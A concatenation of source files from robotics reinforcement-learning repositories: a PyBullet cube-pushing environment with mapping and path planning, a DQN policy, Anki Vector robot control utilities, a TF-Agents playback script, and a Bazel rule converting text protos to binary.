obstacle_visual_shape_id = p.createVisualShape(p.GEOM_MESH, fileName=str(self.assets_dir / 'corner.obj'), rgbaColor=OBSTACLE_COLOR)
else:
obstacle_half_extents = [obstacle['length'] / 2, obstacle['width'] / 2, WALL_HEIGHT / 2]
obstacle_collision_shape_id = p.createCollisionShape(p.GEOM_BOX, halfExtents=obstacle_half_extents)
obstacle_visual_shape_id = p.createVisualShape(p.GEOM_BOX, halfExtents=obstacle_half_extents, rgbaColor=OBSTACLE_COLOR)
obstacle_id = p.createMultiBody(
0, obstacle_collision_shape_id, obstacle_visual_shape_id,
[obstacle['position'][0], obstacle['position'][1], WALL_HEIGHT / 2], p.getQuaternionFromEuler([0, 0, obstacle['heading']])
)
obstacle_ids.append(obstacle_id)
return obstacle_ids
def _reset_poses(self):
# Random robot pose
robot_positions_x, robot_positions_y = self._random_position(ROBOT_RADIUS, 1)
robot_positions = np.stack([robot_positions_x, robot_positions_y, np.tile(0, 1)], axis=1)
robot_headings = self.random_state.uniform(-np.pi, np.pi, 1)
p.resetBasePositionAndOrientation(self.robot_id, robot_positions[0], p.getQuaternionFromEuler([0, 0, robot_headings[0]]))
p.changeConstraint(self.robot_cid, jointChildPivot=robot_positions[0], jointChildFrameOrientation=p.getQuaternionFromEuler([0, 0, robot_headings[0]]), maxForce=MOVEMENT_MAX_FORCE)
# Random cube poses
for cube_id in self.cube_ids:
cube_heading = self.random_state.uniform(-np.pi, np.pi)
# Only spawn cubes outside of the receptacle
done = False
while not done:
cube_position_x, cube_position_y = self._random_position(CUBE_WIDTH / 2)
cube_position = [cube_position_x, cube_position_y]
if not self._cube_position_in_receptacle(cube_position):
done = True
cube_position.append(CUBE_WIDTH / 2)
p.resetBasePositionAndOrientation(cube_id, cube_position, p.getQuaternionFromEuler([0, 0, cube_heading]))
def _random_position(self, radius, size=None):
position_x = self.random_state.uniform(-self.room_length / 2 + radius, self.room_length / 2 - radius, size)
position_y = self.random_state.uniform(-self.room_width / 2 + radius, self.room_width / 2 - radius, size)
return position_x, position_y
def _step_simulation_until_still(self):
# Kick-start gravity
for _ in range(2):
p.stepSimulation()
prev_positions = []
sim_steps = 0
done = False
while not done:
# Check whether anything moved since last step
positions = []
for body_id in self.cube_ids + [self.robot_id]:
position, _ = p.getBasePositionAndOrientation(body_id)
positions.append(position)
if len(prev_positions) > 0:
done = True
for i, position in enumerate(positions):
# Ignore cubes that are in free fall
if position[2] > 0 and np.linalg.norm(np.asarray(prev_positions[i]) - np.asarray(position)) > NOT_MOVING_THRESHOLD:
done = False
break
prev_positions = positions
p.stepSimulation()
# If robot is stacked on top of a cube, reset its position
self.robot_position, self.robot_heading = self._get_robot_pose()
if np.abs(self.robot_position[2]) > ROBOT_HEIGHT / 4:
done = False
robot_position_x, robot_position_y = self._random_position(ROBOT_RADIUS)
self.robot_position = [robot_position_x, robot_position_y]
self.robot_position.append(0)
p.changeConstraint(self.robot_cid, jointChildPivot=self.robot_position, jointChildFrameOrientation=p.getQuaternionFromEuler([0, 0, self.robot_heading]), maxForce=500)
# Break if stuck
sim_steps += 1
if sim_steps > STEP_LIMIT:
break
def _get_robot_pose(self):
robot_position, robot_orientation = p.getBasePositionAndOrientation(self.robot_id)
robot_position = list(robot_position)
robot_heading = orientation_to_heading(robot_orientation)
return robot_position, robot_heading
def _remove_cube(self, cube_id, out_of_bounds=False):
# Hide cubes 1000 m below
p.resetBasePositionAndOrientation(cube_id, [0, 0, -1000], [0, 0, 0, 1])
self.removed_cube_ids_set.add(cube_id)
if not out_of_bounds:
self.inactivity_counter = 0
def _cube_position_in_receptacle(self, cube_position):
cube_position_copy = list(cube_position)
# Sometimes the cube gets squished against the wall
if np.abs(cube_position_copy[0]) + CUBE_WIDTH / 2 > self.room_length / 2:
cube_position_copy[0] = np.sign(cube_position_copy[0]) * (self.room_length / 2 - CUBE_WIDTH)
if np.abs(cube_position_copy[1]) + CUBE_WIDTH / 2 > self.room_width / 2:
cube_position_copy[1] = np.sign(cube_position_copy[1]) * (self.room_width / 2 - CUBE_WIDTH)
vec = np.asarray(cube_position_copy[:2]) - np.asarray(self.receptacle_position[:2])
rotated_vec = [np.cos(-0) * vec[0] - np.sin(-0) * vec[1], np.sin(-0) * vec[0] + np.cos(0) * vec[1]]
if (np.abs(rotated_vec[0]) < (RECEPTACLE_WIDTH - CUBE_WIDTH) / 2 and np.abs(rotated_vec[1]) < (RECEPTACLE_WIDTH - CUBE_WIDTH) / 2):
return True
return False
def _update_occupancy_map_visualization(self, robot_waypoint_positions=None, robot_target_end_effector_position=None):
occupancy_map_vis = self._create_padded_room_zeros() + 0.5
occupancy_map_vis[np.isclose(self.free_space_map, 1)] = 1
occupancy_map_vis[np.isclose(self.occupancy_map, 1)] = 0
height, width = occupancy_map_vis.shape
height, width = height / LOCAL_MAP_PIXELS_PER_METER, width / LOCAL_MAP_PIXELS_PER_METER
self.plt.clf()
self.plt.axis('off')
self.plt.axis([
-self.room_length / 2 - ROBOT_RADIUS, self.room_length / 2 + ROBOT_RADIUS,
-self.room_width / 2 - ROBOT_RADIUS, self.room_width / 2 + ROBOT_RADIUS
])
self.plt.imshow(255 * occupancy_map_vis, extent=(-width / 2, width / 2, -height / 2, height / 2), cmap='gray', vmin=0, vmax=255)
if robot_waypoint_positions is not None:
self.plt.plot(np.asarray(robot_waypoint_positions)[:, 0], np.asarray(robot_waypoint_positions)[:, 1], color='r', marker='.')
if robot_target_end_effector_position is not None:
self.plt.plot(robot_target_end_effector_position[0], robot_target_end_effector_position[1], color='r', marker='x')
self.plt.pause(0.001) # Update display
def _create_padded_room_zeros(self):
return np.zeros((
int(2 * np.ceil((self.room_width * LOCAL_MAP_PIXELS_PER_METER + LOCAL_MAP_PIXEL_WIDTH * np.sqrt(2)) / 2)), # Ensure even
int(2 * np.ceil((self.room_length * LOCAL_MAP_PIXELS_PER_METER + LOCAL_MAP_PIXEL_WIDTH * np.sqrt(2)) / 2))
), dtype=np.float32)
def _create_global_distance_to_receptacle_map(self):
global_map = self._create_padded_room_zeros()
for i in range(global_map.shape[0]):
for j in range(global_map.shape[1]):
position_x = ((j + 1) - global_map.shape[1] / 2) / LOCAL_MAP_PIXELS_PER_METER
position_y = -((i + 1) - global_map.shape[0] / 2) / LOCAL_MAP_PIXELS_PER_METER
global_map[i, j] = ((self.receptacle_position[0] - position_x)**2 + (self.receptacle_position[1] - position_y)**2)**0.5
global_map /= (np.sqrt(2) * LOCAL_MAP_PIXEL_WIDTH) / LOCAL_MAP_PIXELS_PER_METER
global_map *= self.distance_to_receptacle_channel_scale
return global_map
def _create_local_position_map(self):
local_position_map_x = np.zeros((LOCAL_MAP_PIXEL_WIDTH, LOCAL_MAP_PIXEL_WIDTH), dtype=np.float32)
local_position_map_y = np.zeros((LOCAL_MAP_PIXEL_WIDTH, LOCAL_MAP_PIXEL_WIDTH), dtype=np.float32)
for i in range(local_position_map_x.shape[0]):
for j in range(local_position_map_x.shape[1]):
position_x = ((j + 1) - local_position_map_x.shape[1] / 2) / LOCAL_MAP_PIXELS_PER_METER
position_y = -((i + 1) - local_position_map_x.shape[0] / 2) / LOCAL_MAP_PIXELS_PER_METER
local_position_map_x[i][j] = position_x
local_position_map_y[i][j] = position_y
local_position_map_x *= self.position_channel_scale
local_position_map_y *= self.position_channel_scale
return local_position_map_x, local_position_map_y
def _create_global_shortest_path_to_receptacle_map(self):
global_map = self._create_padded_room_zeros() + np.inf
pixel_i, pixel_j = position_to_pixel_indices(self.receptacle_position[0], self.receptacle_position[1], self.configuration_space.shape)
pixel_i, pixel_j = self._closest_valid_cspace_indices(pixel_i, pixel_j)
shortest_path_image, _ = spfa.spfa(self.configuration_space, (pixel_i, pixel_j))
shortest_path_image /= LOCAL_MAP_PIXELS_PER_METER
global_map = np.minimum(global_map, shortest_path_image)
global_map /= (np.sqrt(2) * LOCAL_MAP_PIXEL_WIDTH) / LOCAL_MAP_PIXELS_PER_METER
global_map *= self.shortest_path_channel_scale
return global_map
def _create_global_shortest_path_map(self, robot_position):
pixel_i, pixel_j = position_to_pixel_indices(robot_position[0], robot_position[1], self.configuration_space.shape)
pixel_i, pixel_j = self._closest_valid_cspace_indices(pixel_i, pixel_j)
global_map, _ = spfa.spfa(self.configuration_space, (pixel_i, pixel_j))
global_map /= LOCAL_MAP_PIXELS_PER_METER
global_map /= (np.sqrt(2) * LOCAL_MAP_PIXEL_WIDTH) / LOCAL_MAP_PIXELS_PER_METER
global_map *= self.shortest_path_channel_scale
return global_map
def _get_new_observation(self):
# Capture images from forward-facing camera
camera_position = self.robot_position[:2] + [CAMERA_HEIGHT]
camera_target = [
camera_position[0] + CAMERA_HEIGHT * np.tan(np.radians(90 + CAMERA_PITCH)) * np.cos(self.robot_heading),
camera_position[1] + CAMERA_HEIGHT * np.tan(np.radians(90 + CAMERA_PITCH)) * np.sin(self.robot_heading),
0
]
camera_up = [
np.cos(np.radians(90 + CAMERA_PITCH)) * np.cos(self.robot_heading),
np.cos(np.radians(90 + CAMERA_PITCH)) * np.sin(self.robot_heading),
np.sin(np.radians(90 + CAMERA_PITCH))
]
view_matrix = p.computeViewMatrix(camera_position, camera_target, camera_up)
images = p.getCameraImage(self.camera_image_pixel_width, self.camera_image_pixel_height, view_matrix, self.projection_matrix) # tinyrenderer
# Compute depth
depth_buffer = np.reshape(images[3], (self.camera_image_pixel_height, self.camera_image_pixel_width))
depth = CAMERA_FAR * CAMERA_NEAR / (CAMERA_FAR - (CAMERA_FAR - CAMERA_NEAR) * depth_buffer)
# Construct point cloud
principal = np.asarray(camera_target) - np.asarray(camera_position)
principal = principal / np.linalg.norm(principal)
camera_up = np.asarray(camera_up)
up = camera_up - np.dot(camera_up, principal) * principal
up = up / np.linalg.norm(up)
right = np.cross(principal, up)
right = right / np.linalg.norm(right)
points = np.broadcast_to(camera_position, (self.camera_image_pixel_height, self.camera_image_pixel_width, 3))
limit_y = np.tan(np.radians(CAMERA_FOV / 2))
limit_x = limit_y * self.camera_aspect
pixel_x, pixel_y = np.meshgrid(np.linspace(-limit_x, limit_x, self.camera_image_pixel_width), np.linspace(limit_y, -limit_y, self.camera_image_pixel_height))
points = points + depth[:, :, np.newaxis] * (principal + pixel_y[:, :, np.newaxis] * up + pixel_x[:, :, np.newaxis] * right)
# Get segmentation
seg_raw = np.reshape(images[4], (self.camera_image_pixel_height, self.camera_image_pixel_width))
seg = np.zeros_like(seg_raw, dtype=np.float32)
seg += FLOOR_SEG_INDEX * (seg_raw == 0)
seg += OBSTACLE_SEG_INDEX * (seg_raw >= self.min_obstacle_id) * (seg_raw <= self.max_obstacle_id)
seg += RECEPTACLE_SEG_INDEX * (seg_raw == self.receptacle_id)
seg += ROBOT_SEG_INDEX * (seg_raw == self.robot_id)
seg += CUBE_SEG_INDEX * (seg_raw >= self.min_cube_id) * (seg_raw <= self.max_cube_id)
seg /= MAX_SEG_INDEX
return points, seg
def _update_state(self):
points, seg = self._get_new_observation()
# Update occupancy map
augmented_points = np.concatenate((points, np.isclose(seg[:, :, np.newaxis], OBSTACLE_SEG_INDEX / MAX_SEG_INDEX)), axis=2).reshape(-1, 4)
obstacle_points = augmented_points[np.isclose(augmented_points[:, 3], 1)]
pixel_i, pixel_j = position_to_pixel_indices(obstacle_points[:, 0], obstacle_points[:, 1], self.occupancy_map.shape)
self.occupancy_map[pixel_i, pixel_j] = 1
if self.show_occupancy_map:
free_space_points = augmented_points[np.isclose(augmented_points[:, 3], 0)]
pixel_i, pixel_j = position_to_pixel_indices(free_space_points[:, 0], free_space_points[:, 1], self.free_space_map.shape)
self.free_space_map[pixel_i, pixel_j] = 1
# Update overhead map
augmented_points = np.concatenate((points, seg[:, :, np.newaxis]), axis=2).reshape(-1, 4)
augmented_points = augmented_points[np.argsort(-augmented_points[:, 2])]
pixel_i, pixel_j = position_to_pixel_indices(augmented_points[:, 0], augmented_points[:, 1], self.global_overhead_map.shape)
self.global_overhead_map[pixel_i, pixel_j] = augmented_points[:, 3]
# Update configuration space
selem = disk(np.floor(ROBOT_RADIUS * LOCAL_MAP_PIXELS_PER_METER))
self.configuration_space = 1 - np.maximum(self.wall_map, binary_dilation(self.occupancy_map, selem).astype(np.uint8))
selem_thin = disk(np.floor(ROBOT_HALF_WIDTH * LOCAL_MAP_PIXELS_PER_METER))
self.configuration_space_thin = 1 - binary_dilation(np.minimum(1 - self.wall_map, self.occupancy_map), selem_thin).astype(np.uint8)
self.closest_cspace_indices = distance_transform_edt(1 - self.configuration_space, return_distances=False, return_indices=True)
def _get_local_overhead_map(self):
# Note: Can just use _get_local_map. Keeping this here only for reproducibility since it gives slightly different outputs.
rotation_angle = np.degrees(self.robot_heading) - 90
pos_y = int(np.floor(self.global_overhead_map.shape[0] / 2 - self.robot_position[1] * LOCAL_MAP_PIXELS_PER_METER))
pos_x = int(np.floor(self.global_overhead_map.shape[1] / 2 + self.robot_position[0] * LOCAL_MAP_PIXELS_PER_METER))
mask = rotate_image(np.zeros((LOCAL_MAP_PIXEL_WIDTH, LOCAL_MAP_PIXEL_WIDTH), dtype=np.float32), rotation_angle, order=0)
y_start = pos_y - int(mask.shape[0] / 2)
y_end = y_start + mask.shape[0]
x_start = pos_x - int(mask.shape[1] / 2)
x_end = x_start + mask.shape[1]
crop = self.global_overhead_map[y_start:y_end, x_start:x_end]
crop = rotate_image(crop, -rotation_angle, order=0)
y_start = int(crop.shape[0] / 2 - LOCAL_MAP_PIXEL_WIDTH / 2)
y_end = y_start + LOCAL_MAP_PIXEL_WIDTH
x_start = int(crop.shape[1] / 2 - LOCAL_MAP_PIXEL_WIDTH / 2)
x_end = x_start + LOCAL_MAP_PIXEL_WIDTH
return crop[y_start:y_end, x_start:x_end]
@staticmethod
def _get_local_map(global_map, robot_position, robot_heading):
crop_width = round_up_to_even(LOCAL_MAP_PIXEL_WIDTH * np.sqrt(2))
rotation_angle = 90 - np.degrees(robot_heading)
pixel_i = int(np.floor(-robot_position[1] * LOCAL_MAP_PIXELS_PER_METER + global_map.shape[0] / 2))
pixel_j = int(np.floor(robot_position[0] * LOCAL_MAP_PIXELS_PER_METER + global_map.shape[1] / 2))
crop = global_map[pixel_i - crop_width // 2:pixel_i + crop_width // 2, pixel_j - crop_width // 2:pixel_j + crop_width // 2]
rotated_crop = rotate_image(crop, rotation_angle, order=0)
local_map = rotated_crop[
rotated_crop.shape[0] // 2 - LOCAL_MAP_PIXEL_WIDTH // 2:rotated_crop.shape[0] // 2 + LOCAL_MAP_PIXEL_WIDTH // 2,
rotated_crop.shape[1] // 2 - LOCAL_MAP_PIXEL_WIDTH // 2:rotated_crop.shape[1] // 2 + LOCAL_MAP_PIXEL_WIDTH // 2
]
return local_map
def _get_local_distance_map(self, global_map, robot_position, robot_heading):
local_map = self._get_local_map(global_map, robot_position, robot_heading)
local_map -= local_map.min() # Move the min to 0 to make invariant to size of environment
return local_map
def get_state(self, done=False):
if done:
return None
# Overhead map
channels = []
channels.append(self._get_local_overhead_map())
# Robot state
channels.append(self.robot_state_channel)
# Additional channels
if self.use_distance_to_receptacle_channel:
channels.append(self._get_local_distance_map(self.global_distance_to_receptacle_map, self.robot_position, self.robot_heading))
if self.use_shortest_path_to_receptacle_channel:
global_shortest_path_to_receptacle_map = self._create_global_shortest_path_to_receptacle_map()
channels.append(self._get_local_distance_map(global_shortest_path_to_receptacle_map, self.robot_position, self.robot_heading))
if self.use_shortest_path_channel:
global_shortest_path_map = self._create_global_shortest_path_map(self.robot_position)
channels.append(self._get_local_distance_map(global_shortest_path_map, self.robot_position, self.robot_heading))
if self.use_position_channel:
channels.append(self.local_position_map_x)
channels.append(self.local_position_map_y)
assert all(channel.dtype == np.float32 for channel in channels)
return np.stack(channels, axis=2)
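    # Compute a sparse waypoint path between two positions by running SPFA over the configuration space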
def _shortest_path(self, source_position, target_position, check_straight=False, configuration_space=None):
if configuration_space is None:
configuration_space = self.configuration_space
# Convert positions to pixel indices
source_i, source_j = position_to_pixel_indices(source_position[0], source_position[1], configuration_space.shape)
target_i, target_j = position_to_pixel_indices(target_position[0], target_position[1], configuration_space.shape)
# Check if there is a straight line path
if check_straight:
rr, cc = line(source_i, source_j, target_i, target_j)
if (1 - self.configuration_space_thin[rr, cc]).sum() == 0:
return [source_position, target_position]
# Run SPFA
source_i, source_j = self._closest_valid_cspace_indices(source_i, source_j) # Note: does not use the cspace passed into this method
target_i, target_j = self._closest_valid_cspace_indices(target_i, target_j)
_, parents = spfa.spfa(configuration_space, (source_i, source_j))
# Recover shortest path
parents_ij = np.stack((parents // parents.shape[1], parents % parents.shape[1]), axis=2)
parents_ij[parents < 0, :] = [-1, -1]
i, j = target_i, target_j
coords = [[i, j]]
while not (i == source_i and j == source_j):
i, j = parents_ij[i, j]
if i + j < 0:
break
coords.append([i, j])
# Convert dense path to sparse path (waypoints)
coords = approximate_polygon(np.asarray(coords), tolerance=1)
# Remove unnecessary waypoints
new_coords = [coords[0]]
for i in range(1, len(coords) - 1):
rr, cc = line(*new_coords[-1], *coords[i + 1])
if (1 - configuration_space[rr, cc]).sum() > 0:
new_coords.append(coords[i])
if len(coords) > 1:
new_coords.append(coords[-1])
coords = new_coords
# Convert pixel indices back to positions
path = []
for coord in coords[::-1]:
position_x, position_y = pixel_indices_to_position(coord[0], coord[1], configuration_space.shape)
path.append([position_x, position_y, 0])
if len(path) < 2:
path = [source_position, target_position]
else:
path[0] = source_position
path[-1] = target_position
return path
def _shortest_path_distance(self, source_position, target_position, configuration_space=None):
path = self._shortest_path(source_position, target_position, configuration_space=configuration_space)
return sum(distance(path[i - 1], path[i]) for i in range(1, len(path)))
def _closest_valid_cspace_indices(self, i, j):
return self.closest_cspace_indices[:, i, j]
class RealEnvironment(Environment):
CUBE_REMOVAL_THRESHOLD = 2
REMOVED_BODY_Z = -1000
def __init__(self, robot_index, cube_indices, **kwargs):
super().__init__(**kwargs)
self.robot_index = robot_index
self.cube_indices = cube_indices
assert len(self.cube_indices) == self.num_cubes
self.robot_requires_reset = True
self.cube_removal_counter = {cube_index: 0 for cube_index in self.cube_indices}
def update_poses(self, data):
if data['cubes'] is not None:
for cube_index, cube_id in zip(self.cube_indices, self.cube_ids):
pose = data['cubes'].get(cube_index)
if pose is None or self._cube_position_in_receptacle(pose['position']):
self.cube_removal_counter[cube_index] += 1
if self.cube_removal_counter[cube_index] > self.CUBE_REMOVAL_THRESHOLD:
p.resetBasePositionAndOrientation(cube_id, [0, 0, self.REMOVED_BODY_Z], [0, 0, 0, 1])
else:
self.cube_removal_counter[cube_index] = 0
p.resetBasePositionAndOrientation(cube_id, pose['position'] + [CUBE_WIDTH / 2], p.getQuaternionFromEuler([0, 0, pose['heading']]))
if data['robots'] is not None:
pose = data['robots'].get(self.robot_index)
if pose is not None:
robot_position = pose['position'] + [0]
robot_orientation = p.getQuaternionFromEuler([0, 0, pose['heading']])
if self.robot_requires_reset:
p.resetBasePositionAndOrientation(self.robot_id, robot_position, robot_orientation)
self.robot_requires_reset = False
p.changeConstraint(self.robot_cid, jointChildPivot=robot_position, jointChildFrameOrientation=robot_orientation, maxForce=500)
self._step_simulation_until_still()
self.robot_position, self.robot_heading = self._get_robot_pose()
self._update_state()
def try_action(self, action):
target_end_effector_position = self._step(action, dry_run=True)
result = {'target_end_effector_position': target_end_effector_position[:2]}
return result
def _reset_poses(self):
p.resetBasePositionAndOrientation(self.robot_id, [0, 0, self.REMOVED_BODY_Z], [0, 0, 0, 1])
self.robot_requires_reset = True
for cube_id in self.cube_ids:
p.resetBasePositionAndOrientation(cube_id, [0, 0, self.REMOVED_BODY_Z], [0, 0, 0, 1])
################################################################################
# Helper functions
def round_up_to_even(x):
return int(2 * np.ceil(x / 2))
def distance(position1, position2):
return np.linalg.norm(np.asarray(position1)[:2] - np.asarray(position2)[:2])
def orientation_to_heading(orientation):
# Note: only works for z-axis rotations
return 2 * np.arccos(np.sign(orientation[2]) * orientation[3])
def restrict_heading_range(heading):
return np.mod(heading + np.pi, 2 * np.pi) - np.pi
def heading_difference(heading1, heading2):
return restrict_heading_range(heading2 - heading1)
def position_to_pixel_indices(position_x, position_y, image_shape):
pixel_i = np.floor(image_shape[0] / 2 - position_y * LOCAL_MAP_PIXELS_PER_METER).astype(np.int32)
pixel_j = np.floor(image_shape[1] / 2 + position_x * LOCAL_MAP_PIXELS_PER_METER).astype(np.int32)
pixel_i = np.clip(pixel_i, 0, image_shape[0] - 1)
pixel_j = np.clip(pixel_j, 0, image_shape[1] - 1)
return pixel_i, pixel_j
def pixel_indices_to_position(pixel_i, pixel_j, image_shape):
position_x = (pixel_j - image_shape[1] / 2) / LOCAL_MAP_PIXELS_PER_METER
position_y = (image_shape[0] / 2 - pixel_i) / LOCAL_MAP_PIXELS_PER_METER
return position_x, position_y
```
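As a quick orientation (not part of the repository file above), a minimal random-policy rollout against the `Environment` class might look like the sketch below; it assumes the repo's `assets/` directory and the `spfa` package are available, and the keyword arguments shown are just a subset of the defaults.
```python
# Sketch: run a single episode with uniformly random actions.
import numpy as np

from environment import Environment

env = Environment(obstacle_config='small_empty', num_cubes=10, use_gui=False, random_seed=0)
state = env.reset()  # (96, 96, C) float32 array of stacked channels
done = False
while not done:
    action = np.random.randint(env.get_action_space())  # flat index into the 96x96 action map
    state, reward, done, info = env.step(action)
print('cubes: {}, cumulative reward: {:.2f}'.format(info['cumulative_cubes'], info['cumulative_reward']))
env.close()
```
With random actions the episode typically ends via the inactivity cutoff rather than by clearing all the cubes.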
#### File: jimmyyhwu/spatial-action-maps/policies.py
```python
import random
import torch
from torchvision import transforms
import models
class DQNPolicy:
def __init__(self, cfg, action_space, train=False, random_seed=None):
self.cfg = cfg
self.action_space = action_space
self.train = train
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
self.policy_net = self.build_network()
self.transform = transforms.ToTensor()
# Resume from checkpoint if applicable
if self.cfg.checkpoint_path is not None:
model_checkpoint = torch.load(self.cfg.model_path, map_location=self.device)
self.policy_net.load_state_dict(model_checkpoint['state_dict'])
if self.train:
self.policy_net.train()
else:
self.policy_net.eval()
print("=> loaded model '{}'".format(self.cfg.model_path))
if random_seed is not None:
random.seed(random_seed)
def build_network(self):
raise NotImplementedError
def apply_transform(self, s):
return self.transform(s).unsqueeze(0)
def step(self, state, exploration_eps=None, debug=False):
if exploration_eps is None:
exploration_eps = self.cfg.final_exploration
state = self.apply_transform(state).to(self.device)
with torch.no_grad():
output = self.policy_net(state).squeeze(0)
if random.random() < exploration_eps:
action = random.randrange(self.action_space)
else:
action = output.view(1, -1).max(1)[1].item()
info = {}
if debug:
info['output'] = output.squeeze(0)
return action, info
class SteeringCommandsPolicy(DQNPolicy):
def build_network(self):
return torch.nn.DataParallel(
models.SteeringCommandsDQN(num_input_channels=self.cfg.num_input_channels, num_output_channels=self.action_space)
).to(self.device)
class DenseActionSpacePolicy(DQNPolicy):
def build_network(self):
return torch.nn.DataParallel(
models.DenseActionSpaceDQN(num_input_channels=self.cfg.num_input_channels)
).to(self.device)
```
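DQNPolicy.step() above selects actions epsilon-greedily over the network output: with probability exploration_eps it samples a random action index, otherwise it takes the flat argmax of the predicted Q-values. A standalone sketch of that selection rule, using a random tensor in place of the network output (the action-space size and epsilon are illustrative):
```python
import random
import torch

action_space = 8
exploration_eps = 0.1
output = torch.randn(action_space)  # stands in for self.policy_net(state).squeeze(0)

if random.random() < exploration_eps:
    action = random.randrange(action_space)       # explore: uniform random action index
else:
    action = output.view(1, -1).max(1)[1].item()  # exploit: flat argmax over Q-values
print(action)
```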
#### File: jimmyyhwu/spatial-action-maps/vector_action_executor.py
```python
import time
import numpy as np
import vector_controller
import vector_utils as utils
class VectorActionExecutor:
def __init__(self, robot_index):
if robot_index is None:
robot_name = utils.get_first_available_robot()
if robot_name is None:
print('No robots found')
robot_index = utils.get_robot_indices()[robot_name]
self.robot_index = robot_index
self.controller = vector_controller.VectorController(self.robot_index)
self.last_update_time = time.time()
self.last_robot_position = None
self.last_robot_heading = None
self.stuck_count = 0
self.unstuck_count = 0
self.jittering = False
self.target_end_effector_position = None
def update_try_action_result(self, try_action_result):
# Simulation results
self.target_end_effector_position = try_action_result['target_end_effector_position']
self.last_update_time = time.time()
def step(self, poses):
if self.target_end_effector_position is None:
return
robot_poses = poses['robots']
if robot_poses is None or self.robot_index not in robot_poses:
return
robot_position = robot_poses[self.robot_index]['position']
robot_heading = robot_poses[self.robot_index]['heading']
info = {
'last_robot_position': self.last_robot_position,
'last_robot_heading': self.last_robot_heading,
'robot_position': robot_position,
'robot_heading': robot_heading,
'target_end_effector_position': self.target_end_effector_position,
}
if self.jittering:
info['robot_heading'] += np.random.uniform(-np.pi, np.pi)
self.last_robot_position = robot_position
self.last_robot_heading = robot_heading
# Update the controller
self.controller.step(info)
# Handle robot getting stuck
if self.controller.is_stuck():
self.stuck_count += 1
else:
self.stuck_count = 0
self.unstuck_count += 1
if self.stuck_count > 30:
self.jittering = True
self.unstuck_count = 0
if self.jittering and self.unstuck_count > 5:
self.jittering = False
def is_action_completed(self, timeout=10):
if any([self.controller.is_idle(), self.stuck_count > 10, time.time() - self.last_update_time > timeout]):
return True
return False
def disconnect(self):
self.controller.disconnect()
```
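The stuck/jitter bookkeeping in VectorActionExecutor.step() is a small state machine: roughly 30 consecutive stuck readings switch the executor into a jittering mode that perturbs the commanded heading, and a few unstuck readings switch it back. A standalone sketch of that counter logic with the same thresholds (the real class gets its stuck signal from the controller):
```python
stuck_count = 0
unstuck_count = 0
jittering = False

def update(is_stuck):
    # Mirrors the counter updates in VectorActionExecutor.step().
    global stuck_count, unstuck_count, jittering
    if is_stuck:
        stuck_count += 1
    else:
        stuck_count = 0
        unstuck_count += 1
    if stuck_count > 30:
        jittering = True
        unstuck_count = 0
    if jittering and unstuck_count > 5:
        jittering = False
    return jittering

readings = [True] * 31 + [False] * 6
print([update(r) for r in readings][-3:])  # [True, True, False]: jitter ends once recovered
```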
#### File: jimmyyhwu/spatial-action-maps/vector_utils.py
```python
import configparser
from multiprocessing.dummy import Pool
from pathlib import Path
import anki_vector
def get_config_path():
return Path.home() / '.anki_vector/sdk_config.ini'
def get_config():
config = configparser.ConfigParser()
config.read(get_config_path())
return config
def write_config(config):
with open(get_config_path(), 'w') as f:
config.write(f)
def get_robot_names():
config = get_config()
return sorted(config[serial]['name'] for serial in config.sections())
def get_robot_serials():
config = get_config()
return {config[serial]['name']: serial for serial in config.sections()}
def get_robot_indices():
config = get_config()
return {config[serial]['name']: i for i, serial in enumerate(config.sections())}
def get_available_robots(num_robots=10):
def ping(args):
name, serial = args
try:
with anki_vector.Robot(serial=serial, default_logging=False) as _:
return name
except:
return None
robot_serials = get_robot_serials()
available_names = []
with Pool(len(robot_serials)) as p:
it = p.imap_unordered(ping, robot_serials.items())
for name in it:
if name is not None:
available_names.append(name)
if len(available_names) > num_robots:
return available_names
return available_names
def get_first_available_robot():
names = get_available_robots(num_robots=1)
if len(names) > 0:
return names[0]
return None
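# Example usage (illustrative): the helpers above read ~/.anki_vector/sdk_config.ini and
# ping each configured robot in parallel, so this sketch only works with the Vector SDK
# installed and at least one robot configured.
if __name__ == '__main__':
    indices = get_robot_indices()          # e.g. {'Vector-A1B2': 0, ...}
    name = get_first_available_robot()     # first robot that answers a connection attempt
    if name is None:
        print('no robots reachable')
    else:
        print('using robot', name, 'with index', indices[name])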
``` |
{
"source": "jimmyyhwu/spatial-intention-maps-tf2",
"score": 2
} |
#### File: jimmyyhwu/spatial-intention-maps-tf2/enjoy.py
```python
import argparse
import components
import utils
def main(args):
config_path = args.config_path
if config_path is None:
config_path = utils.select_run()
if config_path is None:
return
print(config_path)
cfg = utils.load_config(config_path)
# Create env
env = utils.get_env_from_cfg(cfg, show_gui=True)
tf_env = components.get_tf_py_env(env, cfg.num_input_channels)
# Load policies
policies = components.load_policies(cfg)
# Run policies
time_step = tf_env.reset()
while True:
robot_group_index = tf_env.pyenv.envs[0].current_robot_group_index()
action_step = policies[robot_group_index].action(time_step)
time_step = tf_env.step(action_step.action)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--config-path')
    main(parser.parse_args())
``` |
{
"source": "jimmyyou/mobile_app",
"score": 3
} |
#### File: cpp/proto/gen_binary_proto.bzl
```python
def convert_java_content(proto_message):
content = """
package package_name;
import com.google.protobuf.TextFormat;
import java.io.*;
public final class Convert {
public static void main(String args[]) throws FileNotFoundException, IOException {
BufferedReader br = new BufferedReader(new FileReader(args[0]));
class_name.Builder builder = class_name.newBuilder();
TextFormat.merge(br, builder);
builder.build().writeTo(System.out);
}
}
"""
package_name = proto_message[:proto_message.rfind(".")]
class_name = proto_message[proto_message.rfind(".") + 1:]
return content.replace("package_name", package_name).replace("class_name", class_name)
def text_to_bin(name, src, out, proto_message, proto_deps):
"""Convert a text proto file to binary file.
Modifying the text proto file is error-prone. Using this utility to
convert text file to binary file help the debugging process since
error will be spotted at compile time not runtime. Furthurmore,
parsing a binary proto file is much more efficient than a text one.
Args:
name: name of the rule.
src: the text file to convert.
out: target output filename.
proto_message: name of the proto message including package name.
proto_deps: the java proto library that proto_message belongs to.
"""
native.genrule(
name = "gen_convert_java",
outs = ["Convert.java"],
cmd = "echo '" + convert_java_content(proto_message) + "' > $@",
)
native.java_binary(
name = "Convert",
srcs = [
"Convert.java",
],
main_class = "org.mlperf.proto.Convert",
deps = proto_deps + [
"@com_google_protobuf//:protobuf_java",
],
)
native.genrule(
name = name,
srcs = [src],
outs = [out],
cmd = ("$(locations :Convert)" +
" $(location " + src + ") > $@"),
exec_tools = [":Convert"],
)
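# Example BUILD-file usage (illustrative: the load path, target names, file names, and
# proto message below are assumptions, not values taken from this repository):
#
#   load("//cpp/proto:gen_binary_proto.bzl", "text_to_bin")
#
#   text_to_bin(
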